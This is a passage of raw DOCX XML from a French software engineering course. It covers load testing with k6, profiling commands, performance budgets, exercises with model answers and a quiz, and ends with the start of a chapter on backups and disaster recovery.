          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Bande passante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Débit plafonné</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Compression, cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Verrou applicatif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Latence en escalier</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Découpler</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UN POOL TROP GRAND SATURE LA BASE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cent réplicas avec vingt connexions chacun font deux mille connexions : la base passe son temps à changer de contexte. Un regroupement de connexions (PgBouncer) ou un pool plus petit donne souvent de meilleurs résultats.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux profileurs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Profilage rapide d'un service Python</w:t>
        <w:br/>
        <w:t>python -m cProfile -o sortie.prof serveur.py</w:t>
        <w:br/>
        <w:t>python -c "import pstats;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pstats.Stats('sortie.prof').sort_stats('cumtime').print_stats(15)"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Profilage d'un service Node</w:t>
        <w:br/>
        <w:t>node --cpu-prof serveur.js</w:t>
        <w:br/>
        <w:t># puis ouvrir le fichier .cpuprofile dans les outils de développement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>86.5 Budget de performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un budget transforme une intention en critère vérifiable. Il s'exprime en latence, en débit et en ressources, et se contrôle dans le pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.338 — Cinq budgets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13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Indicateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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Budget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>p95 page d'accueil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2613"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt; 800 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Test de charge nocturne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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p95 recherche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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&lt; 300 ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Seuil k6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Débit soutenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2613"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt; 300 req/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Palier de 30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Erreurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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&lt; 0,5 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Seuil k6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CPU en pointe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2613"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt; 70 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tableau de bord</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois exécutions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Intégration continue : test court à chaque demande de fusion</w:t>
        <w:br/>
        <w:t>k6 run --vus 20 --duration 2m --quiet scenario.js</w:t>
        <w:br/>
        <w:br/>
        <w:t># Test complet hebdomadaire sur l'environnement de recette</w:t>
        <w:br/>
        <w:t>k6 run --out json=resultats.json scenario_complet.js</w:t>
        <w:br/>
        <w:br/>
        <w:t># Comparaison avec la semaine précédente</w:t>
        <w:br/>
        <w:t>jq -r '.metrics.http_req_duration.values["p(95)"]' resultats.json</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MENER UN TEST DE CHARGE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Définir le parcours et les proportions réalistes.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Fixer des seuils avant de lancer.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Envoyer depuis une machine distincte du service.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Observer la saturation pendant l'exécution.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Comparer à une référence, pas à une impression.</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test de charge mesure un comportement sous un profil donné.</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moyenne masque la queue de latence.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seuils se fixent avant l'exécution.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point de rupture sépare la montée en charge de la saturation.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goulot se trouve en corrélant test et métriques système.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pool de connexions trop grand dégrade la base.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budget de performance se vérifie dans le pipeline.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On compare les résultats à une référence stable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le système tient la charge. Le chapitre suivant organise la survie aux pannes réelles.</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86.1 — Écrire un scénario avec seuils</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Le parcours d'accueil puis recherche doit tenir 100 utilisateurs.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Définissez les étapes.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Ajoutez des pauses.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Fixez deux seuils.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 86.2 — Interpréter un point de rupture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   DIAGNOSTIC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>À 400 utilisateurs, le débit stagne et la latence triple.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Identifiez la ressource saturée.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Vérifiez la file.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Proposez une correction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 86.3 — Définir un budget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'équipe doit pouvoir refuser une livraison trop lente.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Choisissez trois indicateurs.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Fixez des valeurs.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Précisez la vérification.</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86.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>export const options = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  stages: [{ duration: "2m", target: 100 }, { duration: "5m", target: 100 }],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  thresholds: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http_req_failed: ["rate&lt;0.01"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http_req_duration: ["p(95)&lt;800"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:br/>
        <w:t>export default function () {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http.get("https://recette.exemple.fr/");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sleep(1 + Math.random() * 2);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http.get("https://recette.exemple.fr/api/recherche?q=livre");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sleep(1 + Math.random() * 2);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sans pause, un utilisateur virtuel envoie des dizaines de requêtes par seconde : la charge n'est plus réaliste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deux seuils suffisent : un sur les erreurs, un sur la latence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 86.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Observations à 400 VU :</w:t>
        <w:br/>
        <w:t>- débit : 250 req/s (identique à 300 VU)</w:t>
        <w:br/>
        <w:t>- latence p95 : 2,4 s (contre 0,6 s à 300 VU)</w:t>
        <w:br/>
        <w:t>- CPU du service : 62 %</w:t>
        <w:br/>
        <w:t>- connexions PostgreSQL : 198 / 200</w:t>
        <w:br/>
        <w:t>- attente moyenne avant connexion : 900 ms</w:t>
        <w:br/>
        <w:br/>
        <w:t>Diagnostic : saturation du pool de connexions.</w:t>
        <w:br/>
        <w:t>Correction : PgBouncer + pool de 40 connexions par réplica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un CPU à 62 % exclut la saturation processeur : le goulot est ailleurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le nombre de connexions proche du maximum et l'attente avant connexion désignent la base.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 86.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>| Indicateur | Budget | Vérification |</w:t>
        <w:br/>
        <w:t>| Latence p95 accueil | &lt; 800 ms | test de charge en CI |</w:t>
        <w:br/>
        <w:t>| Latence p95 recherche | &lt; 300 ms | seuil k6 |</w:t>
        <w:br/>
        <w:t>| Taux d'erreur | &lt; 0,5 % | seuil k6 |</w:t>
        <w:br/>
        <w:br/>
        <w:t>Une livraison qui dépasse un budget est bloquée jusqu'à correction</w:t>
        <w:br/>
        <w:t>ou dérogation écrite du responsable produit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un budget sans mécanisme de refus n'est qu'une intention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois indicateurs bien choisis valent mieux que quinze mesures ignorées.</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Pourquoi la moyenne de latence est-elle trompeuse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Elle est fausse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Elle masque la queue de distribution</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Elle est trop lente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Elle dépend du réseau</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Quand fixer les seuils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Après le test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Avant le test</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Jamais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Selon la machine</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 révèle un débit qui plafonne alors que la charge augmente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Une erreur de test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Une saturation</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Un cache efficace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Un réseau rapide</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Quel effet d'un pool de connexions trop grand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Plus de débit garanti</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Saturation de la base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Moins de mémoire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Aucun</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Où lancer un test de charge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En production sans prévenir</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Sur un environnement dédié</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Depuis le serveur testé</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Sur son poste uniquement</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Le p95 et le p99 décrivent l'expérience réelle.</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Sinon le seuil s'adapte au résultat, ce qui annule le contrôle.</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Le système n'absorbe plus la charge : les files s'allongent.</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Le coût de changement de contexte dépasse le gain.</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Il faut des dimensions comparables sans impacter le service réel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>87. Résilience : sauvegardes et reprise après sinistre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Préparer le jour où une région entière, une base ou une équipe disparaît.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Avancé · Prérequis : chapitre 86</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Définir RTO et RPO pour un service.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Choisir une stratégie de sauvegarde vérifiable.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Concevoir une reprise progressive.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Tester un plan sans provoquer l'incident.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Éviter les fausses assurances.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>87.1 Deux nombres à décider</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le RTO est la durée d'indisponibilité acceptable ; le RPO est la quantité de données qu'on accepte de perdre. Ces deux valeurs se décident avec le métier, pas avec l'équipe technique seule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.339 — Quatre notions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28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Notion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="363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Question posée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>RTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3633"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
